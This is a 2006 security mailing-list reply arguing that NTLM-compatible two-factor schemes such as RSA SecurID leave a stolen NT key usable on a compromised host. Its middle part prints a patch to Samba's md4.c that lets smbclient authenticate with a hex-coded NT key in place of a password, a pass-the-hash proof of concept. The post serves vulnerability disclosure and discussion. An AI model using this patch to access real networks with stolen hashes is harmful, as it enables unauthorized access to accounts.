Re[3]: RSA SecurID SID800 Token vulnerable by design
Dear Brian Eaton,
--Saturday, September 9, 2006, 6:12:31 PM, you wrote to 3APA3A@xxxxxxxxxxxxxxxx:
BE> For web SSO in particular, accessing the token once is nearly as good
BE> as accessing it constantly. The token will be used for the initial
BE> authentication, but normally a cookie will be used for session
BE> tracking. An attacker who can sniff the token code can certainly
BE> steal the cookie as well.
BE> Two-factor auth cannot be said to make accessing the network from a
BE> compromised PC "safe". That does not make two-factor auth useless.
BE> With plain passwords, once the attacker has the password, they can
BE> access the network at will. With two-factor auth, they can access
BE> the network for a much more limited time span.
Network is compromised as long as attacker keeps control under
compromised host regardless of authentication. And sometimes longer.
At least for some 2-factor authentication schemas implementations under
Windows (I'm not sure about this very implementation) situation may not
significantly different from Web-based scenario. For compatibility with
NTLM authentication user's extended credentials are simply mapped to his
account and it's possible to connect to network using user's NT key. In
standard Windows environment NT key is derived from password. For
extended authentication schema it can be set to some random value. NT
key is stored in memory of compromised host and thus can be extracted.
An example patch for SAMBA smbclient to use hex-coded NT key instead of
password :
--- md4.c.orig 2004-04-04 11:37:00.000000000 +0400
+++ md4.c 2004-10-27 23:01:31.000000000 +0400
@@ -130,6 +130,21 @@
C = 0x98badcfe;
D = 0x10325476;
+
+ if(n == 64){
+ int j;
+ unsigned char * hexd = (unsigned char *)"0123456789ABCDEF";
+ for(j = 0; j<16; j++){
+ if(!strchr(hexd, in[(j<<2)]))break;
+ if(in[(j<<2)+1])break;
+ if(!strchr(hexd, in[(j<<2)+2]))break;
+ if(in[(j<<2)+3])break;
+ out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4);
+ out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd);
+ }
+ if(j == 16) return;
+ }
+
while (n > 64) {
copy64(M, in);
mdfour64(M);
It means, if authentication schema is NTLM-compatible (it must be for
compatibility with pre-Windows 2000 hosts and some network applications,
like Outlook Express), attacker can use compromised account to access
network resources without having access to 2-factor authentication
device. How long he can retain this access depends on how often
account's NT key is changed (usually with password change, but actually
depends on implementation of authentication system and may be never).
--
~/ZARAZA
http://www.security.nnov.ru/